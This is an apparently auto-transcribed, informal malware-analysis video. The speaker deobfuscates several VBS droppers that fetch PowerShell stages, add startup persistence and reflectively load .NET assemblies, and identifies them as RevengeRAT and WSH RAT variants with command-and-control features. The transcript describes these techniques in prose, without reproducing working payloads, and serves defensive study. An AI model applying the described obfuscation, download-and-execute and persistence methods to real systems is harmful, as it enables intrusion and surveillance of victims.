 Hey, what's up? We're gonna be doing some more malware analysis stuff in this video. So here we go. I'm on my Linux virtual machine here, and I got a couple files for us to look at I got three Visual basic script you can tell by the extension here dot VBS files This is gonna be raw and that I have literally never opened these files whatsoever before in my life So I'm just gonna screen record, you know me doing it and we'll see where we go I guess this might be pretty heavily edited, but I have literally no idea. I have not opened these whatsoever So what should we start with ladies and gentlemen? We'll go for the short boy. Let's go for impule. You know what? Let's make directories for these Let's go for impule Whatever that means and let's move the VBS file into that Um, so let's take a look at what he is Oh I like this one. This is this is fun Let's call this Yeah, we should start to clean this so let's go like zero one zero zero cleaned I guess looks like it's creating a w-script shell. Is there a visual basic script? Plug-in for sublime text to get some color in this install package Package control where are you? Oh, he's loading repositories. Okay, whatever We know anyway that that VVVVVVVVVVVVNNNNNNNN is w-script shell, so let's call that a w-script shell and that seems to be just about everywhere else String reverse is gonna be a good power shell boy. You can tell that because it's Including power shell here concatenating it all together together. What is going on? Why is sublime text taken forever to load these repositories? Oh, no. Speak of the devil. Visual basic script, VB script, installing that package. Let's see how we do. Why is it taking so long? Oh my goodness. Let's just call this variable, you know, little PowerShell. Because we know that's what it's going to be. PowerShell. And we could probably literally just like remove this. We can just call that this, the string that we know it's going to be. PowerShell with the space in it. If you can't tell, that's because of this spells PowerShell backwards, all concatenated. And, you know, we reverse it. So there's that PowerShell. They don't have a capital S, not that it literally matters whatsoever. No, it's a lowercase s. With the space. Okay. So set syntax visual basic script. There we go. Now we get some colors in here. We're going to do a run command with our PowerShell string adding in no exit comma command. I'm sure that's command invoke expression new object. What the f that's a lot of plus signs down literally every single empty strings are just being concatenated together here. Alright, we got a nerf that. So let's replace all the backticks that are being used as escape sequences. We'll replace each character that tries to escape just following it with itself. So that's a little bit more readable and legible. Hey, hey, hey, hey, John from the future here real quick, some of you people, you know, the ones you know, those people might be saying, John, why did you bother including the character after the backtick? If you could literally just replace the backtick with nothing, you wouldn't have to worry about the next character. To that, I say you're right. I am a goddamn idiot. Sorry. All right, back to the video everybody bought. And we should also go ahead and remove these single quotes concatenated with single quotes because they're doing nothing. Here we go. Um, did I do something wrong there? Single quote with a plus sign with a plus sign interpreted literally regular expressions please control enter it there we go. What do we got power shell invoke expression new object not that web client download string. Past in his strings. That's kind of neat. Invoking. Wait, how does this do this? Invoke expression dot invoke dot JPEG. So we're downloading a JPEG, right? Oh, and then we're going to exit, but we're going to hide that window and not show it and wait for that command exit. And then we're going to remove our W script shell object. And we're going to sleep for an hour. Yeah. No, no, no, no. 1000 is one second. So a minute. Yes, that's math. Math is hard. Empty string. We'll call that variable empty string. And then a shell follows just after it as a string. So create objects. Okay, it's just gonna literally call that shell application namespace seven. We know from previous videos namespace seven is your current users, like startup directory to auto run and auto start. Once you would log in. So it's going to copy this script. W script dot full name to 1048. What? No, you idiot. That math does not add up copies. Oh, it literally tells us. Thank you. Nice comment explaining what's happening there. Let's do the fun stuff. And let's go figure out what's going on with this power shell syntax pulling from this domain. Please, please, please still be live. I would love to see it. You love to see it curl tack K. Because it's going to use HTTPS and we should probably just go ahead and nerf that what you got for me. Yes. Oh, my goodness, there's stuff. Can I tee that out to zero to power shell dot PS one? Yeah, all righty. So let's check out our zero to power shall PS one. What we got here, boys and girls. Completely random string name to a lot of nonsense. Although however that is seemingly just a binary. I'm pretty sure it's using ads with zeros to denote a zero character. You can see by that replace method up there. So let's clean that up. I'm going to just use Python to do that. Yeah. Yeah, I'll use Python to do that. Go. All right. Now let's double click literally all of that. Sorry. That was very bright, very fast, very quickly. And let's slap that in. There we go. There we go. And we will call that variable hex code because we can tell that it is hex. Now we got another function over here. EA QF JIL. And you do some weird stuff. Oh, you are interpreting hex. Yeah, you're just converting hex to bytes. The way you can tell right is it takes a parameter, which we will call argument one. How about that? And this thing will be a argument list. Excuse me this this new variable CCC VVV five six zero zero zero will be a byte list. Be list of bytes. That's going to be the length of the argument passed in divided by two. So it's cut in half, right? That makes sense because a byte represented in hex will just be two kind of digits or two characters. A through F zero through nine. So we'll call that unhexalified using some Python language there. So then we just loop through the entire argument that we passed in, incrementing by two, taking that index and then converting it with base 16, right? So we are unhexalifying that. So let's call that function unhexalify. Okay. Now we have even more. What the heck? TTT s zero seven eight eight eight eight. And though, however, that's going to be obfuscated once again, with that replace technique. So let's steal all that I'll use Python to do that because it's literally the exact same syntax. Again, just pasting that in double clicking and all this brace your eyes for some white text. There we go. And let's replace that line with that. Oh, crap, you know, I should have saved this as like a zero to a cleaned power shell cleaned thing, because I want to keep the original for posterity's sake. So let's call that other hex, I guess. And then we unhexalify that um, decoded other hex. And then we decode the original hex code that we saw at the very, very top of this script. So we'll call that one just decoded hex. Oh, hello. Hello, computer. Are you there? Okay, decoded hex. Tada. And then we'll use reflection. We'll use some neat little magic in the windows world to load in this entire thing. So we know that this will be a dot net assembly, right? So we can open this thing up in I L spy or DN spy. And then we do a get type based off these class names. Oh gosh. And get method invoke null objects. See when Whoa, where are we going? What are we doing? Red services with our decoded hex. There's stuff happening. Okay, we should totally go ahead and determine what these things are. Because decoded other hex looks like it's going to be the inflect the the reflection loaded program. And we can unhexalify that and create a file from it and then see what this thing ends up running and doing with these function calls here doing something with red services dot exe. And also the decoded hex up here. So let's do it. I'll close out a Python because if we were to simply echo all that out on our terminal, we can use xxd tack our tack P to reverse and print out all of that hex. We'll call that other hex dot is this going to be an exe or a DLL probably a DLL take a guess, right? Let's check out that other hex. It's a DLL. We were right on the money, guys. It is a mono.net assembly, which means that we can open it up in I L spy or dns by I'll use I L spy because the internet gets angry when I do and for some reason I find enjoyment in that I'm just kidding. There's literally no reason why I use that over the other. Aside from the fact that weird, what do I call this? More visual basics or impule other hex dot DLL. There we go. Let's make this text a little bit bigger. So you guys can see it. Kablammy. Let's go 18 because 20 is just too much. Okay, what do we got here? Class library two. Nice. That's a good default visual studio code or visual studio name for the project. And we've got some little classes here to work with. We got a good CGM T for a geo, etc. And we also have some resources loaded in. No, we don't. Never mind. Module stuff. Nothing really usually in there. Let's look at the code, ladies and gentlemen. Talk is cheap. Show me the code. As they say, ah, there's nothing happening in that function. It has already expanded and there's literally nothing happening. Thankfully, however, that is not the one that this thing calls. We can see as the e three zero r k k, etc. So let's check out that function. Oh, gosh, took a little bit of time to decompile. We got other read only random name variables for integer pointers here. Other peculiar ones. He's just laying out struct though. Oh, those must be like the like the types for some wind 32 API stuff callbacks. We are loading in create process, right? So we could probably rename that we are loading in the get thread context. So we could probably rename that wow, 64, get thread context, set thread context, etc, etc, etc, etc, etc. Virtual Alec ex remote resume thread. Oh, goodness. Okay, so this will do something shady. We can know that for sure. What's going on that function? We define that already? No, we're like the very top of this. So if this thing num equals two, otherwise num equals false. Excuse me, num equals four. I was reading that if false, that's never going to happen, guys. That's not not going to do anything. And then go to I'll this thing, which is literally the next line. Okay, cool. Result flag num two, etc. While true. So all the time we're going to check that numb. I'm assuming this is going to end up checking like architecture. Can I go see what this does? discarded unreachable code. That's not helpful for me. Okay. La la la. Let's scroll back up. Gosh, there's a lot in this WTF. What the heck is happening? Oh my goodness. Okay. Okay. Okay. I got my sanity back momentarily. Case five, which we know is not going to happen because it can either be two or four. So far, flag two is going to equal that function. If flag two, oh, it's going to equal not that function seemingly and num six continue. And if that's set checked, what the heck is checked? Is that a function? Where's that coming from? Num equals seven. Result equals true. I'm just reading, reading things right now. None of this makes sense to me. There's that other function that is called discard unreachable code. So there are segments that are just kind of wonky. This other one is up here. This other one is up here. We define a struct. Is that an inline function for checked? Has it happened? Stuff. That's a lot going on. Otherwise, case four. Oh, this is another while loop sort of thing. Wait, wait, wait, wait, wait. One of those is the only functions it's called Q Y P I M. And that's the very, very top one that we saw. I mean, it's I guess it's this class. Oh, no, no, no, but it invokes one specific one. Doesn't it? Yeah. Z L N H A Q Y Y Q. Of course. So let's control it for that guy. That's the function that we're looking at right there. Okay. We run that thing again. Run that thing again. Oh, it's literally, oh, God dang, it's literally the thing we were just looking at. What am I doing? What am I doing? Randomness equals converting that thing, converting that thing to a type handle, bull flag, vodka, four, four MLM. Man, you guys really aren't doing me any favors naming your variables complete nonsense. I gotta say, num 8 in 3260. What the heck? You take an argument somewhere. We know. We know you take an argument somewhere. I mean, I guess it's going to be an argument to this string. Yeah. It doesn't have a name. What, what, how do you, how do you refer to the variable? How do you refer to that parameter? Do you? We're calling registrars.exe somewhere. Buffer block copy. Oh, is this going to be some shell code at some point? Is there going to be shell code in this? Block copy, if that thing with the thing and then do it. Me trying to read code that doesn't make any sense because it has no proper naming. And it's just a bunch of switch case statements. I could, like, sure we could explore through this a little bit more, but truthfully, I don't think we need to. I'll be honest. Get processed by ID. Does this thing return a process ID? That thing does a thing? Nope. Nope. That doesn't do a lot. That doesn't do a lot. Oh, a lot of these are teeny weeny. A lot of these just like are wrappers for other functions. That's dumb. P zero seems to be a process ID, I'm assuming, or a process object. A process ID makes the most sense to me because this is referenced in other places. We could try to explore this and like copy and paste it in sublime text to change up some of those variables. You guys know if I can change variable names like within the DN spy or IEL spy? I don't know. Not gonna lie. Okay. Okay. I think I've had enough of that one. I think we had our fun. It's doing weird stuff. That's good. Oh, wait a second. We didn't even see what the other one, we didn't even see what the other hex was. You guys, you should have told me. I mean, this is still going to be stringing nonsense. So IEL spy, get rid of that tool tip, please. I don't need to see that. Die. Okay. Thanks. IEL spy is gone. Let's do another echo, pacing and all that hex. Let's do an xxd tag R tag P redirect it to argument dot DLL, I guess. Yeah. argument dot DLL is another GUI program, mono.net assembly for Microsoft Windows. I didn't actually do like any other stuff to check out other strings in this. I doubt there'll be actually anything worthwhile or interesting because it already all seems to be relatively well obfuscated with the random variable names. Yep. And we can see all those in there. So not extremely useful. What about our argument dot DLL before we, before we crack that thing open, get type, get method and vote create instance client dot exe. What are you doing? All right. Let's, that one, that one deserves a little bit of love. Let's open it up and IEL spy. If I pass an argument to IEL spy, we'll just like know to do it. Other things that I don't know. We called this more visual basic script argument dot DLL. What do we got? Lime. What? Lime program. What is that? Client run. Okay. So it takes a client object. Have we looked at this before? Have we looked at this sort of thing before? Where's the client? Is that going to be defined in like the lime connection? Probably. Yeah, there it is. Clients. Okie dokie. Send buffer size. Connecting to config.host. There's got to be a config here somewhere. Ping. Keep alive ping. String to bytes. Send it to the packet in the TCP send packet fixer. Okay. So there is functionality to have command control. Is that fair to say? You think am I am I crazy in that and like look we reach out to a server? Yep. Literally create a socket connection based off of the host and the port. So what else we got? How can we read that config? Where does that config live? There's a lot of stuff in lime dot helper. Send info. We'll take a get hard disk serial number. Get IP. Environment machine name. Environment username. Camera. Computer info. Get OS full name. Get system. Get the CPU kind. Get total physical memory. Get AV. Nice. More get antivirus. Check in the firewall. Products. Port key etc. Get active window. So get IP. Get hard disk serial number. Get camera. Sure for drivers. If it has a camera or not. That's kind of crazy. Get system. That looks like it is getting the CPU. Win 32 processor. Get AV. That's going to end up doing some WMI stuff. You can tell the management object searcher and root slash security center variables there. Display name. Yeah. Yeah. Yeah. Get CPU. Read it out of a registry value. Nice. And active window. Okay. So just oh that generates the ID. Wow. Okay. So based off of all those things that's the idea. Prevent sleep run execution state is going to end up being that thing. String converter. These are all a couple of convenience functions right. We are in the helper class seemingly. Hello. That's all. Decompress. Okay. Compressing a gzip stream and coding and decoding from base 64. Fair enough. Lime native methods. These seem to be win 32 API calls that we pull in. So get volume information and get foreground window. Get window text maybe. It doesn't actually say what function. The entry point that it calls it. Cap get driver description and set thread execution state. Huh. Okie dokie. Check out the lime packets. Packet handler. What do we got. So I'm assuming if this is going to be a packet handler that would mean that it runs server side right. Handler. I mean I guess I guess does is the victim the server in this case. No I feel like that would be the client right. But it handles a packet. Right. GPL LP UNV. Call process by name array one default get string. What are these. What are those bytes going to spell out. Let's replace all those new lines with the space. Let's grab this and then let's go back to a. Hello. What am I doing over there. Let's run a Python three. Let's do a CHR of X for X in that list. Get type. Okay. It's all you're doing was just carving together some other syntax. There was not. Okay. Same exact thing. Basically call by name. Some other obfuscation methods. In code. Get executable path. Execute. This one though looks like it has more to it. Let's do that one more time. So CHR of X for X in all of that. Create instance. Okay. Okay. Object call by name looks like it's adding in some file and extension kind of thing based off of the ID. If registry current user open subkey. Whatever. You know. Where is the config file. Lime settings config. Oh what is. Excuse me. Check out this IP address real quick. Check out that port. Revenge rat string key is revenge rat. Let's go to showdown on that real quick. Check out that IP address. Cablammy Dallas United States. What's going on. Didn't we look up. Is that right. Let's look for IP locator. Dallas Texas for real. Okay. I feel like we've seen a lot of Dallas Texas for some reason. The ID looks like it is base 64. And Mr. Ahmed. Excuse me. Mr. Ahmed's revenge rat. Current mutex is that thing. Splitter is nine. Mr. Ahmed revenge rat. Is this a known thing. Cryptid revenge rat. What are you. Thank code. Mr. Ahmed crypto fund. There's a strange email. I'll spy. I'm going to need you to stop throwing in a random tool tip. Whatever you want. Free download bypass windows defender fully undetected asynchronous rat mp3 file. Where's Mr. Ahmed in this. Thank code. Mr. Ahmed. Yeah dude. Check it out. Get express VPN online. The VPN that just works. It just works. Ladies and gentlemen. Cryptid revenge rat. Revenge revenge rat malware. Oh revenge rat is a remote access Trojan discovered by our good friends over at Cisco Talos. Revenge rat Malpedia on any run. Threat post has something over. But I want to know about Mr. Ahmed. Is he. Is this his like claim to fame. Revenge rat is a remote access Trojan discovered by this thing. Bleeping computer provides a technical analysis. Oh heck yeah. I'm loving the bleeping computer guys. That's all that New Jersey cybersecurity is going to be willing to tell me. Revenge rat. One nine three. Wait. That's not the same IP address is it. That's not the same IP address that we have. It's kind of close. Yeah. Okay. He's in sacred. Hey that looks kind of similar to what we had. I mean it's just a running PowerShell. Okay. What do you got for me ZD net. Four net sees it. Visual basic script. Isn't able to call a shell dot application object that generates a new visual basic script file. Oh we do have a couple others that we should tinker with. One of these are going to end up being in batch mode. It will receive commands from command and control IP address volume data machine names usernames whether or not a webcam has been detected. Yeah. Then it gets into WSH rat which is seemingly different revenge rat. The Gorgon group. Is Mr. Ahmed in there. Is Mr. Ahmed and our good Gorgon group. Gigi unit 42 researchers have been tracking. Etc. Technical analysis and some of the attacks as well as attribution links with Pakistani actors have been already depicted by 360 and two sec which I find interesting connection to larger groups of attackers unit 42 which has been tracking which we are calling the Gorgon group. Is that the thing from Legend of Zelda. The Gorgons. Oh no. Gordon. What is it called in Legend of Zelda. Legend of Zelda. No it is a Goron. No second G. Cool. The Gorgons. Oh Remco Smellware. Had some fun with that before. Let's see what we got. Revenge rat. Sheldon application CMB. Is there anything different in this. Oh they call they found the same dot VBS file that the other one did. Downloader downloads something here. Microsoft script file. Yeah. Okay. Okay. Okay. Okay. Okay. Registry keys and Microsoft executing revenge rat and persistence. There they go ahead and run it. Kind of as we saw. Connecting to TTC2 server. Nuclear explosion. So that's like I asked what it is normally called. The IP addresses. Wait, wait, wait, wait, wait. Is that IP address the same as ours. That looks that looks more promising. Oh it's so stinking close. Or was that the same one as last time. I get excited for no reason. Oh port numbers are 5478 and that's not our port number either. I'm just dumb. That's all I else buy stop with the tool tip man. Just as we started analyzing the malware and unfortunately the two command and control servers have been shut down. Tell me about it bro. Like story of my life over here. Not that I'm actually doing anything remotely worthwhile. Okay. So if this is revenge rat all of this tradecraft from what folks have seen previously. Oh, last seen like today though, according to any rent revenge rat is a freely available remote access tool written.net and C sharp. Is there like a link to the source code or something if it's freely available? Silence. Oh, come on. No, this, this just takes me to their website. That's not all that helpful. Breaking it down. They're using awscript.shell object. But then they're creating a schedule task. Yeah. Oh, they do a little reflection kind of the same way we did. Analyzing this function. We found several command magic strings. The researcher wrote the most notable of which are the p command, which asks the malware to collect the victim's topmost winder tile. The IE and LP commands that ask malware to manipulate the system registry, the UNV command packet meanwhile allows them tack or to send malicious assembly language or ASM code of the malware to be executed in memory. We did see that. We did see that in that packet handler, right? Yeah, PIE, PNC, GPL, UNV, and that's going to end up running assembly. Yeah, like shellcode or anything. Neat. Obviously horrific and evil, but still neat. But a fucking nice spot. Stop. As part of the second stage infection chain, version 1.6 of WSA Trot is also executed. Huh. Well, I guess we could take a look at the others now that we kind of know what this thing is. But Revenge Rat telling us to config. Mr. Ahmed. Where are you, Mr. Ahmed? That doesn't help me. If I just Google Mr. Ahmed. I don't know why I did that. That was just like out of out of a broken habit. Mr. Ahmed Cryptor. Oh, what is this? What the F? Get out of here. I elsewhere. I don't like where I am right now. Silent Dock exploit bypass Google. Chrome 2020 silent 100%. Mr. Ahmed. That's got to be him. He has a YouTube channel. Oh my gosh. Oh my gosh. We have to go check him out. What are you doing, Mr. Ahmed? Another one bites the dust. This account has been terminated due to multiple or severe violations of YouTube policy against spam, deceptive practices, misleading content, or other terms of violation, surveillance. He's gone. YouTube took him down. It's canceled culture, everybody. Look at that. Fully undetected. Zero out of 40. No workplace is the show. No schools to show other accounts of the similar name. I don't know if Facebook is the right marketplace to showcase. Oh, and all these videos are down. Aren't they? Oh my gosh. I didn't realize those were all YouTube videos when I was looking at them, but like they're literally all taken down. These are as recent as January. Is there anything that isn't a YouTube video? Who keeps liking these? All of these are YouTube videos. Not the right way, my guy. Not the right... Oh, this one is... Is it a still thing? World of Hacker. These are still live. Now, granted, I don't exactly know what I'm looking at. I'll be honest. None of these look like they should be on the internet. What do we got here? Get out of here. YouTube. No, no, no. What are you trying to do here? Oh, is this the VMware break? Yeah. So, Mr. Ahmed's YouTube account. Is this a video on installing VMware? What a hack. There's more VMware. What are you doing? Oh, Kali Linux. Installing Kali Linux. Oh, no. Get me out of here. I want to go home. I want to go home. Tor, what is the dark web? Avengers Endgame. Hey, sub to World of Hacker. All right, I'm done. I can't look at this anymore. We found Mr. Ahmed, I think, doing our detective work. All right, let's take a breather and let's get back to it in a moment. All right, that was fun. Kind of went down a little bit more of a PowerShell and C-Sharp Road than I kind of wanted to, but let's take a look at some of these other guys here. Let's take a look at Impul S. Let's see if they are any way somewhat related to, oh my gosh, can I type please? Oh my gosh. Let's see if they're related to our revenge rat here. Let's, how many sublime text windows do we have open right now? Too many. Here we go. What is this? Oh, these are so good. What are you? What? Look at this randomness. These are just straight up bytes, just straight up non-printable bytes in the visual basic script. There's a lot of these. Check out my horizontal scroll bar down there. That's dope. That's got to be a whole other binary. That's got to be, we're like just more layers of obfuscated code. What do we got, ladies and gentlemen? What are we doing here? All right, we'll call that everyone's favorite big blob of nonsense. Good, good. Empty string. Oh, wait, no. Empty string. It gets added onto. Yeah, for I to the length of big blob of nonsense. So for every single one of those, it will, what happened? What happened to my empty string? Oh, oh, oh, oh, there are, there are two empty strings. What? What? Second? No, we, we, we hold that we keep that in something and we execute it. So maybe it's just got to be more code. More code. Ta-da. We end it together after we just kind of loop through all of it. What is the ASC function in visual basic script? Visual basic script ASC function. Thanks, Google. Oh, it converts it to ASCII. Okay, it's definitely just adding more and more to it. But is it concatenating this? I'm confused. It does something in mid takes the middle mid function. Oh, it's an index. Mid function returns a specified number of characters from string. Okay. Okay. So this weird thing just happens then. Yeah. Can visual basic script just do like a write out, write to console. Visual basic script. It's probably like a W script echo or something W script echo, or just echo, echo. C script will run it from the console. Oh, so it needs W script. Yeah. W script shell. Where are you getting W script? Or is it just like in the current context or something? Let's let's mess with it. Let's grab all of this. Oh, no, the printable character is going to get wonky. So I need to pull this out to my host. Some way. All right. Let's imp you less. Oh, shoot, I never made a copy of it. I'm a Dumbo. Whatever. I don't really opt. You should be server. Go. Okay, so now let's get to my host. Let's open up the web browser. Oh, shoot. What is that IP address? 10.0.0.17. No, go to my host, please. 10.0.0.17. 8000. Now we got this visual basic script dope. Let's edit that with sublime text. And oh, gosh. Thank you. Now let's not execute it. And let's do a W script dot echo. Oh, shoot. I didn't like save the name of it. It's going to be this thing, right? That's our more code variable. Yeah. Let's hope so. So we aren't executing anymore. Now let's get a command prompt open. Let's go to my desktop. And let's try and run C script. C script. There we go. C script on. Hello. Where did you go? Or no, you're in my downloads, aren't you? Gosh, dang it. Let's put it on my desktop. Okay. CLS. Let's do a little C script on our impulus visual basic script. There we go. Get something new. Get some more visual basic script in there. This. Okay, so let's copy all that. And let's bring that back into the virtual machine here. So this is like, what? Second stage. And this is pretty readable. I say that now empty string shell looks like they're doing the exact same technique to just run shell that application as a string copied in. Yep. Okay. So that's the exact same technique as split equals Najaf. Ready? Those are weird comments. EXE NIM execute a equals FIH. What is FIH? Great objects. Expand environmental string temp. He answers here referring to daytime now. Those comments are nothing. He does not mention anything about looking for a unique num. He does not mention anything about looking for a unique num. What does those mean? What do you mean? Download. That's another function that is seemingly created. Create a shell object, run CMD character 34 and s file. What is character 34 going to do? Checking out Python again. Let's do a CHR 34. Oh, it's just adding strings to it. Okay. Then we go to get information. Yeah, using XML HTTP. So we can make some post requests. Grab our computer name, grab our username. So we have a user. Let's move this out. The user agent we capture the hardware device seemingly, where is HUD coming from? Oh, gosh. Oh, that's another function call. Okay. And security is very likely another function call. Oh, gosh. Yeah, just right beneath it. Using WMI to... Where's that end function? This is the most direct answer to the simple question asked. And is the proven direct... What the heck? Proven direct substitute to Java's system current... That makes no sense. These all seem like revenge rat stuff, at least from everything that we just read. That's it. So this is just another... Just another command control. Another C2. I mean, okay. Added its persistence, tells it that it is ready for information, gets data out. And if it is zero, then it will execute. Or no, no, no, no, no. A zero has got to be like the index split on that. And that will write a file. Oh, all in temp. Okay. If it is NIM, then it will add persistence. Yeah. W end. Oh, that must be a while loop end. So all of this should be its own loop. Okay. Run can run stuff. There's nothing in this loop to actually execute anything, that was there? No, which is weird. Hardware devices, all throughout here. Download. Again, using get, saving it. No. What the heck? S location? Oh, that's just where it's going to end up saving. Yeah. And then run C. What is C set to? I can't search for C all that easily. Unless I do like a C equals. Oh, create object adds it to start up download one C. Okay. Oh, and that is something from NIM. Okay. So it does have the capability to run those through downloading stuff. So it's all just commanding control through stuff that it downloads. I guess. Getting all that information. Interesting. I don't think there's anything else. There aren't any other layers to pull through here. But this must be WSH rap, right? From our Googling revenge rat. Because WSH rap. What you got for me? No, no, no, no. Oh, wow. You can just straight up download it. Excuse me. Buy now order now. Oh, YouTube videos. This is intense, man. It's a whole gooey to it. Okay. That's fine. Who posted this? Who shared this video? Is it Mr. Ahmed? No, it's WSH rat. I need to buy this, but some people said it does not work good in newer Windows 10 operating systems. Does latest version works good and excellent on Windows 10? Yes. Bro, can you upload a PDF exploit to Android? What does that mean? Dope. You have another product apparently, don't you? Look at this. Live view keylogger. Other features. Guys, you can go to this website. WSH software.site is a public thing. RDP viewer. Process explorer. Paste code here to run remote scripts. Nice. Hidden browser. Reverse proxy. Remote VNC. Buy me with Bitcoin. Hey, what about Dogecoin over here in New York? Oh gosh. Okay. That was fun. What do you got? Houdini. Wasn't a lot of, wasn't a lot of whole technical information in that. So let's go back. Let's keep you going around. Although that was a different IP address, right? This is 19437172. Let's check that out and show down. That's again, slightly different, but Dallas, Texas guys. Dallas. I don't know if you know this, but something, I don't know. Like, I don't want to say, Hey, you got hackers in Dallas. That should be a movie. But maybe something is compromised over there. I don't know. Because a lot of these kind of seem to be not doing their thing. Also, this file is still a FTP open. And of course, a classic RDP open to the internet. Right on, guys. Throw security out the window. Who needs it? Can we like reach that page? If I, if I curl this, is that going to like get all wonk? It's dead. Supposedly, supposedly it's dead. Okay. Okie dokie. Let's keep going around on WSH rat worry any rat security affairs for the net again. Threat post. These are the same. I think these are pretty close to the same things that we saw earlier. What's up with my cursor, guys? Come on now. I don't need help finding my cursor. Although I appreciate it. Yeah, check it through. Look at our website. Buy bit. Buy us with Bitcoin. Shall I go to the equation now? I want to see the code. Oh, this doesn't look like what we were looking at. I'll be honest. WSH at core. Yeah, that's not what we've been looking at. Oh, it does post though. Some pay spin. Nope. Nope. Nope. Nope. Nope. Maybe this isn't WSH rat because if it has all that functionality, and like we just didn't know. Let's go back to this though. These don't look like they're the same. Everything that we've kind of seen W script wise doesn't seem to do that. I think. Is that IP address the same as ours? We know one nine three. No, one nine four. Yeah. I keep messing that up. Let's go into that again. Threat post had a portion on WSH rat. No, these, these just don't seem to be the same WSH rat. Check it out. Some spam emails. Okay, I'm done with that. Yep. Dunzo. Let's go check out that last one. All right, let's check out our e file transmitter. Let's make directory for e file transmitter and then move that e file transmitter VDS into that directory. Now we can hop over there and take a look. This one's fun. It just seems to decode some base 64. Oh wow. This is its own like, this is an implementation of base 64 in visual basics. That's neat. I'm swiping that. I'm gonna add that to my toolkit. I don't know about you. Cool. And then just straight up execute it. So that's kind of cheesy. Let's call this variable base 64 code. Yeah. And let's call this variable decoded base 64. Bunch of V's and then we execute it. So all we have to do is straight up decode this. Let's put that in base 64 tech. We'll decode that to zero to like stage second stage or whatever second state dot VBS. What do you got? It's the exact same code. It's literally identical. This is this is the exact same thing as what we just saw different different IP address different port. Are you still over in Dallas? Don't don't be over in Dallas buddy. I'm really bummed. No, is that the same? That's the same. It's just a different port. Oh shoot. I wonder if I wonder if that IP address is on. See if that rat is still active. Lamos. One day we'll get a live one guys. One day. This is the exact same code though. Download function hwd function. Yeah. Yeah. It's still the exact same thing. Well, I don't think there's a whole lot else to this. It's just it's interesting that that one used visual basic script while the other just used some strange X or things. So there's got to be some tidbit to it. But that's all I think that's all I kind of wanted to go through. So I'm fading out not going to lie. That was a bad video because it was just kind of chilling just kind of me goofing off is kind of me doing whatever. I don't know if that's actually helpful or useful for people. So please let me know in the comments. You know, weird kind of video, but I figured it. Hey, you know what? We try it just to just record stuff. Thanks so much for watching everybody. If I do actually upload this by